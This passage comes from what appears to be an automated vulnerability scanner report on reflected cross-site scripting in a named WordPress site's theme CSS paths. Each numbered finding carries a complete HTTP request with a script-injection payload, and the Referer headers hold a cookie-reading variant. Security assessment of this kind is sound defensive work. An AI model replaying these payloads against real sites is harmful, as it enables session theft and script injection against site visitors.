<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpeb741\"><script>alert(1)</script>99ae03579d0/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.201. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d4b"><script>alert(1)</script>cf7dabca00c was submitted in the REST URL parameter 4. This input was echoed as d8d4b\"><script>alert(1)</script>cf7dabca00c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/cssd8d4b"><script>alert(1)</script>cf7dabca00c/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/cssd8d4b\"><script>alert(1)</script>cf7dabca00c/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.202. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5fa5"><script>alert(1)</script>d67de01ff03 was submitted in the REST URL parameter 5. This input was echoed as f5fa5\"><script>alert(1)</script>d67de01ff03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.cssf5fa5"><script>alert(1)</script>d67de01ff03 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.cssf5fa5\"><script>alert(1)</script>d67de01ff03" type="hidden" />
...[SNIP]...

1.203. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758e2"><script>alert(1)</script>4b8bc89c082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 758e2\"><script>alert(1)</script>4b8bc89c082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?758e2"><script>alert(1)</script>4b8bc89c082=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?758e2\"><script>alert(1)</script>4b8bc89c082=1" type="hidden" />
...[SNIP]...

1.204. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981c"><script>alert(1)</script>b15b61d6299 was submitted in the REST URL parameter 1. This input was echoed as 4981c\"><script>alert(1)</script>b15b61d6299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4981c"><script>alert(1)</script>b15b61d6299/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content4981c\"><script>alert(1)</script>b15b61d6299/themes/rt_mynxx_wp/css/template.css" type="hidden" />
...[SNIP]...

1.205. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8683c"><script>alert(1)</script>bcd24929a4c was submitted in the REST URL parameter 2. This input was echoed as 8683c\"><script>alert(1)</script>bcd24929a4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes8683c"><script>alert(1)</script>bcd24929a4c/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes8683c\"><script>alert(1)</script>bcd24929a4c/rt_mynxx_wp/css/template.css" type="hidden" />
...[SNIP]...

1.206. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4df"><script>alert(1)</script>0c240e70acf was submitted in the REST URL parameter 3. This input was echoed as 7b4df\"><script>alert(1)</script>0c240e70acf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp7b4df"><script>alert(1)</script>0c240e70acf/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp7b4df\"><script>alert(1)</script>0c240e70acf/css/template.css" type="hidden" />
...[SNIP]...

1.207. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a88e"><script>alert(1)</script>a859c781526 was submitted in the REST URL parameter 4. This input was echoed as 7a88e\"><script>alert(1)</script>a859c781526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css7a88e"><script>alert(1)</script>a859c781526/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css7a88e\"><script>alert(1)</script>a859c781526/template.css" type="hidden" />
...[SNIP]...

1.208. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7a5"><script>alert(1)</script>b62332fda7c was submitted in the REST URL parameter 5. This input was echoed as 4a7a5\"><script>alert(1)</script>b62332fda7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css4a7a5"><script>alert(1)</script>b62332fda7c HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css4a7a5\"><script>alert(1)</script>b62332fda7c" type="hidden" />
...[SNIP]...

1.209. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd965"><script>alert(1)</script>e1be0e8eba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd965\"><script>alert(1)</script>e1be0e8eba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css?bd965"><script>alert(1)</script>e1be0e8eba4=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css?bd965\"><script>alert(1)</script>e1be0e8eba4=1" type="hidden" />
...[SNIP]...

1.210. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a40c"><script>alert(1)</script>edd1009451f was submitted in the REST URL parameter 1. This input was echoed as 9a40c\"><script>alert(1)</script>edd1009451f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9a40c"><script>alert(1)</script>edd1009451f/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content9a40c\"><script>alert(1)</script>edd1009451f/themes/rt_mynxx_wp/css/typography.css" type="hidden" />
...[SNIP]...

1.211. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f80"><script>alert(1)</script>99d09042358 was submitted in the REST URL parameter 2. This input was echoed as a1f80\"><script>alert(1)</script>99d09042358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa1f80"><script>alert(1)</script>99d09042358/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesa1f80\"><script>alert(1)</script>99d09042358/rt_mynxx_wp/css/typography.css" type="hidden" />
...[SNIP]...

1.212. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92458"><script>alert(1)</script>69527ee13c9 was submitted in the REST URL parameter 3. This input was echoed as 92458\"><script>alert(1)</script>69527ee13c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp92458"><script>alert(1)</script>69527ee13c9/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp92458\"><script>alert(1)</script>69527ee13c9/css/typography.css" type="hidden" />
...[SNIP]...

1.213. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29c1"><script>alert(1)</script>4cf7d2ba27e was submitted in the REST URL parameter 4. This input was echoed as d29c1\"><script>alert(1)</script>4cf7d2ba27e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/cssd29c1"><script>alert(1)</script>4cf7d2ba27e/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
